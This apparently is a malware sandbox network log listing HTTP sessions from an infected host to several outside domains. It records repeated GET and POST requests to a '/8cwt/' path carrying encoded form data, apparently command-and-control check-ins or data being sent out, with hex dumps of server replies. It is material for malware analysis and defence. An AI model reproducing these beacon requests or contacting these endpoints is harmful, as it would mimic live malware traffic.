                                      Data Raw: 32 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 cb 6e d3 40 14 dd e7 2b 2e de 24 91 5a 4f 8a 40 42 89 63 89 d2 20 90 4a a9 68 2a 81 10 42 63 fb 26 1e b0 67 86 99 71 d3 14 90 58 21 58 01 1b 04 2a 2b e8 82 87 40 48 6c 40 3c be a6 e1 b1 e2 17 b8 76 02 2d 8f 15 0b 5b f2 dc 73 ce 3d f7 31 0e 0e 2c 9d 3e d6 3f b7 da 83 13 fd 53 cb b0 ba be b8 7c f2 18 78 f3 8c 9d ec f5 8f 33 b6 d4 5f 9a 46 0e fa 2d c6 7a 2b 5e 58 0b 52 97 67 61 90 22 4f e8 c3 09 97 61 38 b9 b3 33 d9 79 b6 fb ee ee ee fb 27 5f 9f de 98 ec 3c ff f6 e0 cd b7 ed 9b 93 ed c7 df 3f dc da 7d fb 72 b2 fd f1 fb 87 db 93 57 0f 3e df 7f f7 e5 e3 bd 2f 2f 1e 06 6c 4a ad 05 36 36 42 3b b0 26 ee 7a ec d2 95 02 cd d8 cf 85 f4 2f 59 0f c2 80 4d c3 94 8a 55 29 83 48 25 63 4a bf 10 06 1c 52 83 03 22 79 50 69 75 eb ff e1 a3 fe 7f e6 39 39 23 0f d4 8d 85 70 45 39 38 ae 0a 99 cc 8e 74 d8 4f 11 0c 52 29 d6 61 02 eb 67 96 61 c4 2d 48 c2 0d 4a 1c 28 09 2e 15 16 2c 9a 0d 34 7e c0 34 29 e9 f0 68 92 08 27 94 e4 59 36 9e 03 0e 87 5a 87 e0 97 78 0d 8d 51 a6 12 42 [TRUNCATED]
                                      Data Ascii: 2dcTn@+.$ZO@Bc Jh*Bc&gqX!X*+@Hl@<v-[s=1,>?S|x3_F-z+^XRga"Oa83y'_<?}rW>//lJ66B;&z/YMU)H%cJR"yPiu99#pE98tOR)aga-HJ(.,4~4)h'Y6ZxQBCCTdSPX.WT\(]yr=g<IZ<&Zh<faUGZ4/v\ S8t<CNPao 0mQ<]e\^G'F`o!Q.ka>Q!lChh4np.$AaF}fDY5XeDj|3Avyu#B=uNzFBj6c[[~XG\X&e[DpL6S\\V-IQi2zb+<7-v8PftwU/&0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.11.3049897173.232.18.16180
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:22.285574913 CEST433OUTGET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.airportsurvery.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:22.451523066 CEST1289INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:19:45 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Data Raw: 34 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 27 3e e5 8f a4 e5 a4 a9 e4 b9 90 e4 bb a3 e8 a8 80 e5 a4 aa e9 98 b3 e9 9b 86 e5 9b a2 ef bc 88 e4 b8 ad e5 9b bd ef bc 89 e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e [TRUNCATED]
                                      Data Ascii: 48c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title></title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title=''></a></h1><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.meas-elec.com Port 80</address><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/airportsurvery.com.xml" target="_blank">XML </a> | <a href="/airportsurvery.com.html" target="_blank">Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src = ' [TRUNCATED]
                                      Jun 4, 2024 14:20:22.451534986 CEST93INData Raw: 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 20 7d 29 28 29 3b 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74
                                      Data Ascii: yTagName("script")[0];s.parentNode.insertBefore(bp, s); })(); </script></body></html>0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.11.3049898203.161.49.19380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:27.630053997 CEST692OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 44 66 37 65 31 6f 5a 42 69 42 78 71 63 4a 7a 63 7a 73 54 39 37 75 43 39 41 52 35 75 67 4c 63 6e 4f 4f 75 71 71 75 76 7a 71 56 62 62 72 57 30 6f 30 4e 76 49 65 30 32 35 6e 78 39 45 6a 44 62 73 77 72 54 73 2b 2b 51 49 48 50 49 69 44 4b 66 49 39 37 49 2f 30 34 4b 73 6a 41 4d 55 4e 35 47 64 4c 63 6f 75 72 46 33 57 65 4b 43 36 77 36 59 6b 2f 43 77 76 6e 66 34 64 59 72 30 58 64 35 70 76 6a 4c 53 2f 4a 74 77 2b 49 4e 48 41 74 39 34 55 46 52 6b 7a 56 42 5a 50 6e 6b 49 66 34 66 46 49 59 76 33 47 34 6e 63 6f 43 70 57 30 67 78 4b 58 33 43 51 30 6b 41 3d 3d
                                      Data Ascii: 24eluX=fQBmmYz6qvK+Df7e1oZBiBxqcJzczsT97uC9AR5ugLcnOOuqquvzqVbbrW0o0NvIe025nx9EjDbswrTs++QIHPIiDKfI97I/04KsjAMUN5GdLcourF3WeKC6w6Yk/Cwvnf4dYr0Xd5pvjLS/Jtw+INHAt94UFRkzVBZPnkIf4fFIYv3G4ncoCpW0gxKX3CQ0kA==
                                      Jun 4, 2024 14:20:27.806950092 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:27 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.11.3049899203.161.49.19380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:30.331979036 CEST712OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 43 2b 4c 65 7a 50 74 42 33 52 78 31 51 70 7a 63 6d 38 54 44 37 75 65 39 41 51 39 48 68 34 34 6e 4f 76 65 71 34 73 48 7a 74 56 62 62 6c 32 30 74 77 4e 76 42 65 30 36 66 6e 31 39 45 6a 44 50 73 77 71 6a 73 2b 74 34 4c 46 66 49 67 57 61 66 4b 77 62 49 2f 30 34 4b 73 6a 42 6f 36 4e 39 53 64 4c 74 59 75 71 68 6a 5a 46 71 43 35 35 61 59 6b 73 53 77 6a 6e 66 35 34 59 71 35 4d 64 37 42 76 6a 4f 32 2f 4a 2f 59 68 54 64 48 43 77 4e 35 47 4d 30 52 4e 56 44 59 39 32 57 59 6c 2f 65 5a 39 64 34 47 63 6c 6b 6f 71 52 4a 71 5a 38 77 6e 2f 31 41 52 76 35 4d 44 52 2b 6f 54 6f 67 77 4f 52 72 6b 56 47 71 63 2f 50 78 63 4d 3d
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh44nOveq4sHztVbbl20twNvBe06fn19EjDPswqjs+t4LFfIgWafKwbI/04KsjBo6N9SdLtYuqhjZFqC55aYksSwjnf54Yq5Md7BvjO2/J/YhTdHCwN5GM0RNVDY92WYl/eZ9d4GclkoqRJqZ8wn/1ARv5MDR+oTogwORrkVGqc/PxcM=
                                      Jun 4, 2024 14:20:30.518039942 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:30 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.11.3049900203.161.49.19380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:33.032955885 CEST1629OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 66 51 42 6d 6d 59 7a 36 71 76 4b 2b 43 2b 4c 65 7a 50 74 42 33 52 78 31 51 70 7a 63 6d 38 54 44 37 75 65 39 41 51 39 48 68 34 77 6e 4f 64 57 71 37 4e 48 7a 73 56 62 62 37 6d 30 73 77 4e 75 42 65 30 79 54 6e 31 35 55 6a 41 33 73 79 49 48 73 75 4d 34 4c 50 66 49 67 4f 71 66 50 39 37 4a 2f 30 34 61 6f 6a 42 34 36 4e 39 53 64 4c 76 41 75 71 31 33 5a 48 71 43 36 77 36 59 77 2f 43 78 2b 6e 65 52 4f 59 71 39 63 61 4b 68 76 69 75 6d 2f 4b 4d 77 68 66 64 48 63 78 4e 34 44 4d 30 56 6f 56 41 39 43 32 58 38 44 2f 63 4a 39 63 4d 50 51 79 55 30 56 47 6f 65 47 31 51 6a 79 68 79 4a 34 30 2f 62 63 36 59 50 53 33 68 4b 4f 7a 68 6c 6e 39 2b 48 34 76 4b 4f 78 71 2f 72 50 52 37 75 7a 33 43 36 55 61 6c 4d 62 2b 4a 54 75 49 79 64 42 57 5a 7a 76 5a 72 2f 6a 58 72 79 2b 61 4f 6a 52 49 52 43 51 4e 70 56 76 31 62 58 36 64 77 51 42 32 39 65 73 65 6e 7a 68 34 77 74 6d 66 70 46 6a 53 65 64 6e 7a 63 32 38 6a 65 71 53 66 43 71 53 75 44 4c 58 57 57 55 37 36 64 35 6d 61 42 30 54 52 59 33 41 42 65 2b 78 68 56 59 [TRUNCATED]
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh4wnOdWq7NHzsVbb7m0swNuBe0yTn15UjA3syIHsuM4LPfIgOqfP97J/04aojB46N9SdLvAuq13ZHqC6w6Yw/Cx+neROYq9caKhvium/KMwhfdHcxN4DM0VoVA9C2X8D/cJ9cMPQyU0VGoeG1QjyhyJ40/bc6YPS3hKOzhln9+H4vKOxq/rPR7uz3C6UalMb+JTuIydBWZzvZr/jXry+aOjRIRCQNpVv1bX6dwQB29esenzh4wtmfpFjSednzc28jeqSfCqSuDLXWWU76d5maB0TRY3ABe+xhVYaNJahIx/TGyu3UVHEvALcr/79udhI8FMfSV9znbVokJCWmmJxiXnUUtXLvX2K/ooo46NSFz1h5NsWaa3LAkwJjR+2s8kpKLNiTPUnrLlsqVOFo4g/yE/MrG+6mmu3kleid/66rhLE3aTFgB1B1nx5rIdsyITeP5oLFiwyEUIocWD2LNuHernjvh06m+J1GeRQKFnAMSAjpY4LhoSMXYVp4vPE3E5Nelx4F68rzw0zHSEM3jEt+jXtKXt+JscL0A2mj32JDNHG+Wdqob0vedtJEv9+8RL8ahYoxSTm2WqM0olJ7VquuhL370R6hzDAZpCR9LKpjtOxSBwVOpRwzS9y+GMdBvZaiwOOn05k+3vVqNUpQ0A0/fkXxhaXTebO6LRcDcmoUIMMEVxQBS6uQVK4XAyqcYO8NzavsVKliQ786lc9RV8PxB53xAro+UGq6oCu/7MhGxMe71LPNXRVTOtTY/IQTdP2m7T0kWY12CQHzhusYxGlKo9MwpqDUwGZClOkqbOa7pzzOrx3kAOFCkUrEsetFFO8+vjfiva+ZpIeuoJbTxX9hjXg4RiZdDz1jwsZ/SorhYjCb1Vlj4bgDjEWqeP4l5FY5Rrpdoz5dRNe0CtKP0RnAWmCeYLPhkaLdfFrkidTngE1GpiBsPKyV0wzyQ/6rXtjb73FV [TRUNCATED]
                                      Jun 4, 2024 14:20:33.216226101 CEST533INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:33 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.11.3049901203.161.49.19380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:35.735954046 CEST429OUTGET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:20:35.910913944 CEST548INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:20:35 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.11.304990291.195.240.12380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:41.154891968 CEST674OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4c 2f 71 6a 4e 5a 55 2b 69 41 31 6b 36 4d 33 64 49 2b 45 36 65 49 42 78 45 34 62 52 62 67 4c 6b 39 34 58 47 37 69 2b 51 57 55 2b 37 71 54 50 6b 2f 4c 6d 4a 46 55 79 64 45 76 61 7a 6c 31 73 4e 2b 32 78 63 37 67 73 75 59 39 52 7a 6a 32 33 47 47 68 62 7a 35 65 42 71 7a 44 4c 72 70 4a 71 37 44 66 61 7a 56 62 4d 30 66 76 39 65 70 55 30 4c 34 37 78 6c 31 38 68 6b 38 64 6e 4d 31 78 4e 33 48 70 39 55 41 4d 72 30 79 71 37 44 61 45 65 62 71 58 46 4c 6c 75 74 42 38 71 64 74 33 69 78 70 61 41 47 36 59 2b 52 56 57 68 4d 47 69 47 6d 63 32 47 42 75 59 41 3d 3d
                                      Data Ascii: 24eluX=9LLMoauWOkuQL/qjNZU+iA1k6M3dI+E6eIBxE4bRbgLk94XG7i+QWU+7qTPk/LmJFUydEvazl1sN+2xc7gsuY9Rzj23GGhbz5eBqzDLrpJq7DfazVbM0fv9epU0L47xl18hk8dnM1xN3Hp9UAMr0yq7DaEebqXFLlutB8qdt3ixpaAG6Y+RVWhMGiGmc2GBuYA==
                                      Jun 4, 2024 14:20:41.379555941 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.11.304990391.195.240.12380
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:20:43.924374104 CEST694OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 39 4c 4c 4d 6f 61 75 57 4f 6b 75 51 4b 63 43 6a 4d 36 73 2b 6b 67 31 6e 2f 4d 33 64 48 65 45 41 65 49 64 78 45 38 43 57 62 57 7a 6b 39 5a 6e 47 30 41 57 51 59 30 2b 37 7a 6a 50 62 77 72 6d 53 46 55 2f 67 45 76 6d 7a 6c 31 6f 4e 2b 32 68 63 36 58 77 76 4a 39 52 31 71 57 33 45 49 42 62 7a 35 65 42 71 7a 44 50 4e 70 4a 79 37 44 50 4b 7a 57 36 4d 72 42 2f 39 42 68 30 30 4c 38 37 78 68 31 38 68 57 38 5a 48 71 31 30 4a 33 48 74 78 55 41 2b 44 33 34 71 37 42 45 30 66 2b 35 48 52 46 6b 75 4a 64 79 70 41 30 35 43 64 4c 53 33 33 67 46 39 6c 58 46 42 77 72 2b 48 4c 30 30 45 41 31 46 44 46 6d 45 6a 70 66 75 4e 69 56 46 6f 54 67 4f 6d 58 35 66 44 45 3d
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbWzk9ZnG0AWQY0+7zjPbwrmSFU/gEvmzl1oN+2hc6XwvJ9R1qW3EIBbz5eBqzDPNpJy7DPKzW6MrB/9Bh00L87xh18hW8ZHq10J3HtxUA+D34q7BE0f+5HRFkuJdypA05CdLS33gF9lXFBwr+HL00EA1FDFmEjpfuNiVFoTgOmX5fDE=
                                      Jun 4, 2024 14:20:44.156729937 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
